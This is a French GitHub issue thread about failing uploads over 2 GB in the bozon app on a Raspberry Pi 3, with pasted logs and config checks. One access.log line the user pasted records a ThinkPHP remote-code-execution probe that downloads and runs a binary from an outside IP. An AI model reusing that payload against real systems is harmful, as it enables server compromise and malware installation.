### ISSUE TITLE
Problème d'upload de taille > 2G sur raspberry pi 3

### ISSUE THREAD

**Issue by chapototo** [YunoHost-Apps/bozon_ynh#37]
bonjour, 
cela fait plusieurs jours que je me bats pour essayer d'uploader des fichiers dont la taille est supérieure à 2G sur mon raspberry 3.
les paramètres sont bien transmis par bozon.conf, je peux uploader le fichier, il arrive à 100% mais une fois fini, le fichier n'apparait ni dans l'interface ni dans le repertoire upload.
les seules erreurs qui s'affichent dans les logs sont les suivantes:

**/var/log/nginx/error.log**
`2019/07/03 08:14:23 [error] 1206#1206: ocsp.int-x3.letsencrypt.org could not be resolved (110: Operation timed out) while requesting certificate status, responder: ocsp.int-x3.letsencrypt.org
2019/07/03 08:14:49 [info] 28273#28273: Using 32768KiB of shared memory for nchan in /etc/nginx/nginx.conf:64
2019/07/03 08:17:39 [info] 28478#28478: Using 32768KiB of shared memory for nchan in /etc/nginx/nginx.conf:64
2019/07/03 08:18:54 [info] 28566#28566: Using 32768KiB of shared memory for nchan in /etc/nginx/nginx.conf:64`

**/var/log/nginx/access.log**
`188.217.41.101 - - [03/Jul/2019:08:18:49 +0100] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.172.110.245/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Uirusu/2.0"
::1 - - [03/Jul/2019:08:18:54 +0100] "GET /nginx_status HTTP/1.1" 302 154 "-" "python-requests/2.12.4"
::1 - - [03/Jul/2019:08:23:13 +0100] "GET /nginx_status HTTP/1.1" 302 154 "-" "python-requests/2.12.4"`

**/var/log/php7.0-fpm.log**
`[03-Jul-2019 08:28:32] NOTICE: systemd monitor interval set to 10000ms
[03-Jul-2019 08:28:32] WARNING: [pool bozon] child 29447 said into stderr: "ERROR: Unable to set php_value 'always_populate_raw_post_data'"
[03-Jul-2019 08:28:32] WARNING: [pool bozon] child 29449 said into stderr: "ERROR: Unable to set php_value 'always_populate_raw_post_data'"
[03-Jul-2019 08:28:32] WARNING: [pool bozon] child 29450 said into stderr: "ERROR: Unable to set php_value 'always_populate_raw_post_data'"
[03-Jul-2019 08:49:04] WARNING: [pool bozon] child 2605 said into stderr: "ERROR: Unable to set php_value 'always_populate_raw_post_data'"`

j'ai également changé dans "/var/www/bozon/config.php" le paramètre $max_length=1000000; mais rien non plus.

Je sèche un peu et un peu d'aide serait bienvenue.
Merci beaucoup

**Comment by chapototo** [comment]
personne? 😥

**Comment by ewilly** [comment]
Bonjour,
je n'arrive pas à repoduire l'issue. Que donnent les commandes suivantes : 
`cat /var/www/bozon/core/auto_dropzone.php | grep max_length`
`cat /etc/php5/fpm/pool.d/bozon.conf | grep upload_max_filesize`
`cat /etc/php5/fpm/pool.d/bozon.conf | grep post_max_size`
`cat /etc/nginx/DOMAIN/bozon.conf | grep client_max_body_size` (remplacer DOMAIN par votre domaine)

**Comment by chapototo** [comment]
ha super merci!

` 'max_length'=>$max_length,
$max=min($auto_dropzone['max_length'],$ini_max_upload,$ini_max_post);`

je suis sous php 7.0

`cat /etc/php/7.0/fpm/pool.d/bozon.conf | grep upload_max_filesize
php_value[upload_max_filesize] = 10G`

`cat /etc/php/7.0/fpm/pool.d/bozon.conf | grep post_max_size
php_value[post_max_size] = 10G`

`cat /etc/nginx/conf.d/chapototo.nohost.me.d/bozon.conf | grep client_max_body_size
        client_max_body_size 100G;`

en fait j'ai un peu l'impression qu'il y a un timeout au moment de l'upload. Quand la progressbar arrive à 100% ça reste bloqué pendant quelques secondes et ça rebascule sur l'interface précédente, sans avoir uploadé quoique ce soit....ça me deconnecte même des fois de bozon, je suis obligé de me relogger.

J'ai essayé d'uploader directement en sftp ds le repertoire upload puis de recharger la base de données de bozon, et le fichier apparait bien mais avec  une taille de '-1950482432 B'

Je sèche un peu

Merci en tout cas

**Comment by ewilly** [comment]
Bon on va essayer qq trucs. D'abord sur le timeout:
Dans /etc/nginx/conf.d/chapototo.nohost.me.d/bozon.conf, peux-tu ajouter sous fastcgi_intercept_errors on; (ligne 39) :
```
fastcgi_read_timeout 30m;
fastcgi_send_timeout 30m;
```

**Comment by chapototo** [comment]
j'ai mis :
`fastcgi_read_timeout 60m;
fastcgi_send_timeout 60m;` au cas où mais pareil. 
pas d'upload ds le repertoire et la page se recharge sans que le fichier soit ajouté 🤔

**Comment by ewilly** [comment]
Il y a normalement 2 fichiers log spécifiques à bozon dans /var/log/nginx. Racontent-ils qqch de particulier ? Une autre piste serait les droits d'accés, quel sont-ils pour /home/yunohost.app/bozon/ et les dossiers enfants ?

**Comment by chapototo** [comment]
je vais essayer de reuploader un gros fichier pour voir ce que les logs racontent à cet instant.
Mais je n'ai pas de problème d'upload ni d'accès pour les fichiers <2G.
Tout marche nickel pour ceux là.

**Comment by chapototo** [comment]
pour un fichier de 2,2 Go
**/var/log/nginx/error.log**
`2019/07/10 12:46:23 [error] 1304#1304: ocsp.int-x3.letsencrypt.org could not be resolved (110: Operation timed out) while requesting certificate status, responder: ocsp.int-x3.letsencrypt.org
2019/07/10 12:48:24 [info] 23318#23318: Using 32768KiB of shared memory for nchan in /etc/nginx/nginx.conf:64`

**/var/log/nginx/access.log**
`::1 - - [10/Jul/2019:12:48:24 +0100] "GET /nginx_status HTTP/1.1" 302 154 "-" "python-requests/2.12.4"`

**Comment by ewilly** [comment]
Tu n'a pas de log bozon.domain.acces.log et bozon.domain.error.log ?

**Comment by chapototo** [comment]
non aucun 🤔

**Comment by ewilly** [comment]
N'arrivant pas à reproduire le phénomène, c'est un peu compliqué d'investiguer. Le problème se reproduit-il sur une installation fraîche de bozon ? Rencontres-tu également le problème avec Jirafeau ?

**Comment by chapototo** [comment]
oui j'ai essayé de repartir aussi sur une install avec juste yunhost et bozon et meme problème.

**Comment by chapototo** [comment]
et j'ai essayé jirafeau, pareil et lufi, pareil

**Comment by chapototo** [comment]
je viens de mettre un fichier de 1.96Go et il est passé. Par contre j'ai une erreur tout de même:
`[10-Jul-2019 13:11:18] WARNING: [pool bozon] child 2271 said into stderr: "NOTICE: PHP message: PHP Notice:  Undefined offset: 3 in /var/www/bozon/core/auto_dropzone.php on line 98"`

**Comment by chapototo** [comment]
la ligne 98
**return @round($bytes / pow(1024, ($i = floor(log($bytes, 1024)))), $precision).' '.$unit[$i];**

**Comment by chapototo** [comment]
`2019/07/10 13:11:18 [error] 1311#1311: *2861 FastCGI sent in stderr: "PHP message: PHP Notice:  Undefined offset: 3 in /var/www/bozon/core/auto_dropzone.php on line 98" while reading response header from upstream, client: *****, server: chapototo.nohost.me, request: "POST /bozon/index.php HTTP/2.0", upstream: "fastcgi://unix:/var/run/php/php7.0-fpm-bozon.sock:", host: "chapototo.nohost.me", referrer: "https://chapototo.nohost.me/bozon/index.php?p=admin&token=*****"`

**Comment by chapototo** [comment]
je suis tombé sur ça:
[https://forum.owncloud.org/viewtopic.php?t=21992](url)
[https://github.com/nextcloud/nextcloudpi/issues/158](url)
peut etre une piste?
à priori un problème avec le php en 32bits?

**Comment by chapototo** [comment]
[https://ownyourbits.com/2018/02/06/nextcloudpi-updated-to-nc13-brings-ufw-security-improvements-auto-snapshots-and-more/](url)
avec comme solution de decouper en plusieurs chunks à l'upload et les reunir ensuite.... c'est pas gagné 😊

**Comment by chapototo** [comment]
ça serait cool d'integrer ça [https://github.com/GerHobbelt/BigUpload](url)
